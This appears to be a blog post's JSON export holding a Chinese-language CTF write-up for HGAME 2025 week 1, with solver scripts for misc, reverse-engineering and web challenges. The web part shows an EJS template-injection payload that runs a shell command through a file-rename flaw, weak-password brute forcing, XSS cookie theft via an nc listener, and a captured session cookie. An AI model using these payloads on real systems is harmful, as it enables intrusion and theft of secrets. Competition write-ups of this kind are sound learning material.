{"id":10,"date":"2025-02-28T16:18:46","date_gmt":"2025-02-28T08:18:46","guid":{"rendered":"https:\/\/www.hurkin.top\/?p=10"},"modified":"2025-02-28T20:39:16","modified_gmt":"2025-02-28T12:39:16","slug":"hgame-week1_wp","status":"publish","type":"post","link":"https:\/\/www.hurkin.top\/index.php\/2025\/hgame-week1_wp\/","title":{"rendered":"HGAME-WEEK1_WP"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">                                                                                                   -----by Hurkin<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b7e\u5230<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">TEST NC<\/h3>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"535\" height=\"370\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203203509900.png\" alt=\"\" class=\"wp-image-14\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203203509900.png 535w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203203509900-300x207.png 300w\" sizes=\"auto, (max-width: 535px) 100vw, 535px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\u4ece\u8fd9\u91cc\u5f00\u59cb\u7684\u5e8f\u7ae0\u3002<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">hgame{Now-I-kn0w-how-to-subm1t-my-fl4gs!}<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Misc<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Hakuya Want A Girl Friend<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e0b\u8f7d\u5f97\u5230\u4e00\u4e2atxt\u6587\u4ef6\uff0c\u91cc\u9762\u662f16\u8fdb\u5236 \u4e00\u773c\u6709zip<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u63d0\u53d6\u51fa\u6765 \u53d1\u73b0\u91cc\u9762\u9700\u8981\u5bc6\u7801<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540e\u7528010\u6253\u5f00 \u53d1\u73b0\u662fpng\u53cd\u8f6c exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-base-2-background-color has-background\"><code>import os\nimport binascii\ndef file_to_hex(file_path):\n  if not os.path.exists(file_path):\n\u2022 &nbsp;  raise FileNotFoundError(f\"\u6587\u4ef6 {file_path} \u4e0d\u5b58\u5728\")\n  with open(file_path, 'rb') as f:\n\u2022 &nbsp;  data = f.read()\n\u2022 &nbsp;  hex_data = binascii.hexlify(data)\n\u2022 &nbsp;  return hex_data\ndef reverse_hex(hex_str):\n  reversed_hex = ''.join(&#91;hex_str&#91;i:i+2] for i in range(0, len(hex_str), 2)]&#91;::-1])\n  return reversed_hex\ndef process_file(input_path, output_path):\n  hex_data = file_to_hex(input_path)\n  reversed_hex = reverse_hex(hex_data.decode())\n  with open(output_path, 'wb') as f:\n\u2022 &nbsp;  f.write(binascii.unhexlify(reversed_hex.encode()))\nif __name__ == \"__main__\":\n  input_file = 'XXXXXXXXXXXXXXXXXXXXXX\\\\a.png'  # \u8f93\u5165\u6587\u4ef6\u8def\u5f84\n  output_file = 'XXXXXXXXXXXXXXXXXXXXXX\\\\b.png'  # \u8f93\u51fa\u6587\u4ef6\u8def\u5f84\n  process_file(input_file, output_file)\n  print(f\"\u6587\u4ef6\u5df2\u6210\u529f\u5904\u7406\u5e76\u4fdd\u5b58\u5230 {output_file}\")<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540e\u5f97\u5230\u5e05\u7167\uff0c\u518d\u6062\u590d\u5bbd\u9ad8\u5f97\u5230\u5bc6\u7801<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"604\" height=\"132\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203203931348.png\" alt=\"\" class=\"wp-image-15\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203203931348.png 604w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203203931348-300x66.png 300w\" sizes=\"auto, (max-width: 604px) 100vw, 604px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u89e3\u538b\u83b7\u5f97<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"670\" height=\"130\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203203944077.png\" alt=\"\" class=\"wp-image-16\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203203944077.png 670w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203203944077-300x58.png 300w\" sizes=\"auto, (max-width: 670px) 100vw, 670px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540e\u628ahagme\u6539\u6210hgame\u5c31\u884c<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Computer cleaner<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">prat1\u3002\u5728shell.php\u91cc<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">hgame{y0u_<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"625\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204222318702-1024x625.png\" alt=\"\" class=\"wp-image-17\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204222318702-1024x625.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204222318702-300x183.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204222318702-768x468.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204222318702-1536x937.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204222318702-2048x1249.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u540c\u76ee\u5f55\u4e0b\u6709ip\u5730\u5740121.41.34.25<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"625\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204223502586-1024x625.png\" alt=\"\" class=\"wp-image-18\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204223502586-1024x625.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204223502586-300x183.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204223502586-768x468.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204223502586-1536x937.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204223502586-2048x1249.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbf\u95ee\u5f97<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"792\" height=\"372\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204223639708.png\" alt=\"\" class=\"wp-image-19\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204223639708.png 792w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204223639708-300x141.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204223639708-768x361.png 768w\" sizes=\"auto, (max-width: 792px) 100vw, 792px\" \/><\/figure>\n\n\n\n<pre class=\"wp-block-preformatted\">hav3_cleaned_th3<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"632\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204223725902-1024x632.png\" alt=\"\" class=\"wp-image-20\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204223725902-1024x632.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204223725902-300x185.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204223725902-768x474.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204223725902.png 1066w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u540e\u4e00\u90e8\u5206<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">_c0mput3r!}<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u6240\u4ee5 flag\u662f<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">hgame{y0u_hav3_cleaned_th3_c0mput3r!}<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Level 314 \u7ebf\u6027\u8d70\u5eca\u4e2d\u7684\u53cc\u751f\u5b9e\u4f53<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">linear1 \u5c42\u5bf9\u8f93\u5165\u5f20\u91cf\u8fdb\u884c\u7ebf\u6027\u53d8\u6362<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">security\u5c42\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u5982\u679c\u8f93\u5165\u5f20\u91cf\u7684\u5747\u503c\u63a5\u8fd10.31415\uff0c\u5219\u89e3\u7801\u5e76\u6253\u5370\u9690\u85cf\u7684flag\u3002<\/li>\n\n\n\n<li>\u5982\u679c\u8f93\u5165\u5f20\u91cf\u7684\u5747\u503c\u5927\u4e8e0.5\uff0c\u5219\u89e3\u7801\u5e76\u6253\u5370\u865a\u5047\u7684flag<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">relu\u5c42\u5bf9\u8f93\u5165\u5f20\u91cf\u5e94\u7528ReLU\u6fc0\u6d3b\u51fd\u6570<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">linear2 \u5c42\u662f\u4e00\u4e2a\u6807\u51c6\u7684\u7ebf\u6027\u53d8\u6362\u5c42<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>import torch<br>from torch import optim<br>from io import StringIO<br>import sys<br># \u52a0\u8f7d\u9884\u8bad\u7ec3\u6a21\u578b<br>model = torch.jit.load('Model.pt')<br># \u8bbe\u5b9a\u76ee\u6807\u5747\u503c<br>desired_mean = 0.31415<br># \u521d\u59cb\u5316\u8f93\u5165\u5f20\u91cf<br>batch_size = 1<br>input_dim = 10<br>input_data = torch.full((batch_size, input_dim), 0.0, requires_grad=True)<br># \u914d\u7f6e\u4f18\u5316\u5668<br>optimizer = optim.Adam(&#91;input_data], lr=0.01)<br># \u5b9a\u4e49\u635f\u5931\u51fd\u6570<br>def compute_loss(output_mean):<br> &nbsp;  return (output_mean - desired_mean) ** 2<br># \u6267\u884c\u4f18\u5316\u8fc7\u7a0b<br>max_iterations = 1000<br>for iteration in range(max_iterations):<br> &nbsp;  optimizer.zero_grad()<br> &nbsp;  # \u524d\u5411\u4f20\u64ad<br> &nbsp;  linear_output = model.linear1(input_data)<br> &nbsp;  current_mean = torch.mean(linear_output)<br> &nbsp;  # \u8ba1\u7b97\u635f\u5931<br> &nbsp;  loss = compute_loss(current_mean)<br> &nbsp;  # \u53cd\u5411\u4f20\u64ad\u4e0e\u4f18\u5316<br> &nbsp;  loss.backward()<br> &nbsp;  optimizer.step()<br> &nbsp;  # \u6253\u5370\u4e2d\u95f4\u7ed3\u679c<br> &nbsp;  if iteration % 100 == 0:<br> &nbsp; &nbsp; &nbsp;  print(f\"Iteration {iteration}: Current mean = {current_mean.item()}, Loss = {loss.item()}\")<br># \u8f93\u51fa\u6700\u7ec8\u7ed3\u679c<br>print(f\"Final input mean: {torch.mean(input_data).item()}\")<br>print(f\"Post-linear1 mean: {torch.mean(model.linear1(input_data)).item()}\")<br># \u91cd\u5b9a\u5411\u6807\u51c6\u8f93\u51fa\u4ee5\u6355\u83b7print\u8f93\u51fa<br>original_stdout = sys.stdout<br>sys.stdout = captured_stdout = StringIO()<br># \u8fd0\u884c\u5b8c\u6574\u6a21\u578b<br>final_output = model(input_data)<br># \u6062\u590d\u6807\u51c6\u8f93\u51fa<br>sys.stdout = original_stdout<br># \u68c0\u67e5\u5e76\u6253\u5370\u6355\u83b7\u7684\u8f93\u51fa<br>output_log = captured_stdout.getvalue()<br>if \"Hidden:\" in output_log:<br> &nbsp;  print(\"Found the real flag:\")<br> &nbsp;  print(output_log)<br>else:<br> &nbsp;  print(\"Failed to find the real flag.\")<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"505\" height=\"32\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250207105410450.png\" alt=\"\" class=\"wp-image-21\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250207105410450.png 505w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250207105410450-300x19.png 300w\" sizes=\"auto, (max-width: 505px) 100vw, 505px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">RE<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Compress dot new<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u5148\u89e3\u6790 Huffman \u6811<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code>enc.txt<\/code> \u7684\u7b2c\u4e00\u90e8\u5206\u662f Huffman \u6811\u7684 JSON \u8868\u793a\u3002\u6211\u4eec\u9700\u8981\u89e3\u6790\u8fd9\u4e2a JSON \u5e76\u91cd\u5efa Huffman \u6811\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u518d\u89e3\u7801\u4e8c\u8fdb\u5236\u6570\u636e<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u7b2c\u4e8c\u90e8\u5206\u662f\u4f7f\u7528 Huffman \u7f16\u7801\u540e\u7684\u4e8c\u8fdb\u5236\u6570\u636e\u3002\u6211\u4eec\u9700\u8981\u6839\u636e Huffman \u6811\u5c06\u8fd9\u4e9b\u4e8c\u8fdb\u5236\u6570\u636e\u89e3\u7801\u56de\u539f\u59cb\u5b57\u7b26\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u540e\u91cd\u5efa\u539f\u59cb\u6587\u672c<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5c06\u89e3\u7801\u540e\u7684\u5b57\u7b26\u6309\u987a\u5e8f\u6392\u5217\uff0c\u5f97\u5230 <code>flag.txt<\/code> \u7684\u539f\u59cb\u5185\u5bb9\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import json<br># \u89e3\u6790 Huffman \u6811<br>def parse_huffman_tree(node, code='', code_dict=None):<br> &nbsp;  if code_dict is None:<br> &nbsp; &nbsp; &nbsp;  code_dict = {}<br> &nbsp;  if 's' in node:<br> &nbsp; &nbsp; &nbsp;  code_dict&#91;node&#91;'s']] = code<br> &nbsp;  else:<br> &nbsp; &nbsp; &nbsp;  if 'a' in node:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  parse_huffman_tree(node&#91;'a'], code + '0', code_dict)<br> &nbsp; &nbsp; &nbsp;  if 'b' in node:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  parse_huffman_tree(node&#91;'b'], code + '1', code_dict)<br> &nbsp;  return code_dict<br># \u89e3\u7801\u4e8c\u8fdb\u5236\u6570\u636e<br>def decode_binary_data(binary_data, code_dict):<br> &nbsp;  reverse_code_dict = {v: k for k, v in code_dict.items()}<br> &nbsp;  current_code = ''<br> &nbsp;  decoded_text = ''<br> &nbsp;  for bit in binary_data:<br> &nbsp; &nbsp; &nbsp;  current_code += bit<br> &nbsp; &nbsp; &nbsp;  if current_code in reverse_code_dict:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  decoded_text += chr(reverse_code_dict&#91;current_code])<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  current_code = ''<br> &nbsp;  return decoded_text<br># \u8bfb\u53d6 enc.txt<br>with open('D:\\\\AAAHurkin\\\\Code\\\\CTF\\\\\u6bd4\u8d5b\\\\2025\\\\HGAME\\\\WEEK1\\\\Compress dot new\\\\enc.txt', 'r') as file:<br> &nbsp;  data = file.read().split('\\n')<br> &nbsp;  huffman_tree_json = data&#91;0]<br> &nbsp;  binary_data = data&#91;1]<br># \u89e3\u6790 Huffman \u6811<br>huffman_tree = json.loads(huffman_tree_json)<br>code_dict = parse_huffman_tree(huffman_tree)<br># \u89e3\u7801\u4e8c\u8fdb\u5236\u6570\u636e<br>decoded_text = decode_binary_data(binary_data, code_dict)<br># \u8f93\u51fa\u89e3\u7801\u540e\u7684\u6587\u672c<br>print(decoded_text)<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"690\" height=\"34\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203222427249.png\" alt=\"\" class=\"wp-image-22\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203222427249.png 690w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203222427249-300x15.png 300w\" sizes=\"auto, (max-width: 690px) 100vw, 690px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Turtle<\/h3>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"708\" height=\"496\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204190255652.png\" alt=\"\" class=\"wp-image-23\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204190255652.png 708w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204190255652-300x210.png 300w\" sizes=\"auto, (max-width: 708px) 100vw, 708px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u76f4\u63a5\u8131\u58f3\uff0c\u8131IDA\u5206\u6790\uff0c\u5176\u4e2dKEY\u662fRC4\u52a0\u5bc6\uff0cflag\u662f\u7528key\u52a0\u5bc6<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">exp:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>def rc4(key, data):<br>    # \u521d\u59cb\u5316S\u76d2<br>\u200b    S = list(range(256))<br>\u200b    j = 0<br>    # KSA\u9636\u6bb5<br>\u200b    for i in range(256):<br>\u200b        j = (j + S&#91;i] + key&#91;i % len(key)]) % 256<br>\u200b        S&#91;i], S&#91;j] = S&#91;j], S&#91;i]<br>    # PRGA\u9636\u6bb5\u751f\u6210\u5bc6\u94a5\u6d41<br>\u200b    i = j = 0<br>\u200b    keystream = &#91;]<br>\u200b    for _ in range(len(data)):<br>\u200b        i = (i + 1) % 256<br>\u200b        j = (j + S&#91;i]) % 256<br>\u200b        S&#91;i], S&#91;j] = S&#91;j], S&#91;i]<br>\u200b        k = S&#91;(S&#91;i] + S&#91;j]) % 256]<br>\u200b        keystream.append(k)<br>    # \u5f02\u6216\u89e3\u5bc6<br>\u200b    return bytes(&#91;data&#91;x] ^ keystream&#91;x] for x in range(len(data))])<br># \u89e3\u5bc6Key<br>encrypted_key = bytes(&#91;0xCD, 0x8F, 0x25, 0x3D, 0xE1, 0x51, 0x4A])<br>key_seed = b'yekyek'<br>decrypted_key = rc4(key_seed, encrypted_key)<br>print(\"Key:\", decrypted_key.decode())<br># \u89e3\u5bc6Flag<br>v5_encrypted = bytes(&#91;<br>    0xF8, 0xD5, 0x62, 0xCF, 0x43, 0xBA, 0xC2, 0x23,<br>    0x15, 0x4A, 0x51, 0x10, 0x27, 0x10, 0xB1, 0xCF,<br>    0xC4, 0x09, 0xFE, 0xE3, 0x9F, 0x49, 0x87, 0xEA,<br>    0x59, 0xC2, 0x07, 0x3B, 0xA9, 0x11, 0xC1, 0xBC,<br>    0xFD, 0x4B, 0x57, 0xC4, 0x7E, 0xD0, 0xAA, 0x0A<br>])<br>flag = rc4(decrypted_key, v5_encrypted)<br>print(\"Flag:\", flag.decode('utf-8', errors='ignore'))<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"74\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204190053987-1024x74.png\" alt=\"\" class=\"wp-image-24\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204190053987-1024x74.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204190053987-300x22.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204190053987-768x55.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204190053987.png 1263w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">WEB<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Level 24 Pacman<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u7528\u9f20\u6807\u6253\u5f00\uff0c\u53bb\u7f8e\u5316\u4e00\u4e0b<a href=\"https:\/\/obf-io.deobfuscate.io\/\" target=\"_blank\"  rel=\"nofollow\" >https:\/\/obf-io.deobfuscate.io\/<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5bf9js\u8fdb\u884c\u5206\u6790<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"817\" height=\"469\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203212245323.png\" alt=\"\" class=\"wp-image-25\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203212245323.png 817w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203212245323-300x172.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203212245323-768x441.png 768w\" sizes=\"auto, (max-width: 817px) 100vw, 817px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u5e94\u8be5\u662f\u4e0a\u9762\u7684base64\u5bf9\u5e94\u5230\u8fbe\u4e00\u4e07\u5206\u5f97\u5230\u7684aGFldTRlcGNhXzR0cmdte19yX2Ftbm1zZX0=<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\uff08\u5176\u5b9e\u63a7\u5236\u53f0\u6539\u5206\u6570\u4e5f\u884c<img decoding=\"async\" alt=\"image-20250203212711024\" src=\"\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u540e\u5f97\u5230<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"221\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203212711024-1024x221.png\" alt=\"\" class=\"wp-image-26\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203212711024-1024x221.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203212711024-300x65.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203212711024-768x166.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203212711024.png 1071w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1021\" height=\"1024\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203212859542-1021x1024.png\" alt=\"\" class=\"wp-image-27\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203212859542-1021x1024.png 1021w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203212859542-300x300.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203212859542-150x150.png 150w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203212859542-768x770.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250203212859542.png 1269w\" sizes=\"auto, (max-width: 1021px) 100vw, 1021px\" \/><\/figure>\n\n\n\n<pre class=\"wp-block-preformatted\">haeu4epca_4trgm{_r_amnmse}<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Level 47 BandBomb<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e2a\u7f51\u9875\u662f\u57fa\u4e8evue\u7684\uff0c\u6240\u4ee5\u4e0d\u8003\u8651php\u9a6c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>app.post('\/rename', (req, res) =&gt; {<br> const { oldName, newName } = req.body;<br> const oldPath = path.join(__dirname, 'uploads', oldName);<br> const newPath = path.join(__dirname, 'uploads', newName);<br> if (!oldName || !newName) {<br>  return res.status(400).json({ error: ' ' });<br> }<br> fs.rename(oldPath, newPath, (err) =&gt; {<br>  if (err) {<br>   return res.status(500).json({ error: ' ' + err.message });<br>  }<br>  res.json({ message: ' ' });<br> });<br>});<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\/rename\u63a5\u53e3\u53ef\u4ee5\u6539\u540d\uff0c\u7528POSTMAN\u4f20JSON\uff0c\u8986\u76d6ejs\u6253\u6a21\u677f\u9a6c<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bd5\u4e86\u4e00\u4e0b\uff0c\u4e0d\u5728\u76ee\u5f55\u4e0b\uff0c\u5c31\u60f3\u5230\u73af\u5883\u53d8\u91cf\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">exp:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;%- process.mainModule.require('child_process').execSync('env') %&gt;<\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"562\" height=\"343\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204204706607.png\" alt=\"\" class=\"wp-image-28\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204204706607.png 562w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204204706607-300x183.png 300w\" sizes=\"auto, (max-width: 562px) 100vw, 562px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u5237\u65b0\u4e00\u4e0b\u7f51\u9875\uff0c\u7136\u540e\u5c31\u663e\u793a\u51faflag<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"67\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204204434642-1024x67.png\" alt=\"\" class=\"wp-image-29\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204204434642-1024x67.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204204434642-300x20.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204204434642-768x50.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250204204434642.png 1338w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Level 69 MysteryMessageBoard<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u5148\u5f31\u5bc6\u7801\u7206\u7834\uff0c\u5f97\u5230\u5bc6\u7801888888<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540e\u662fxss\uff0c\u5728\u7528nc\u76d1\u542c<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">exp\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"69\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250206144416690-1024x69.png\" alt=\"\" class=\"wp-image-30\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250206144416690-1024x69.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250206144416690-300x20.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250206144416690-768x52.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250206144416690.png 1201w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">session=MTczODgyMzkzNXxEWDhFQVFMX2dBQUJFQUVRQUFBbl80QUFBUVp6ZEhKcGJtY01DZ0FJZFhObGNtNWhiV1VHYzNSeWFXNW5EQWNBQldGa2JXbHV8CVCTE94XqyZtucHRBJG8ctXbXWl5GynvfM6RcnYa-EI=<\/p>\n\n\n\n<p 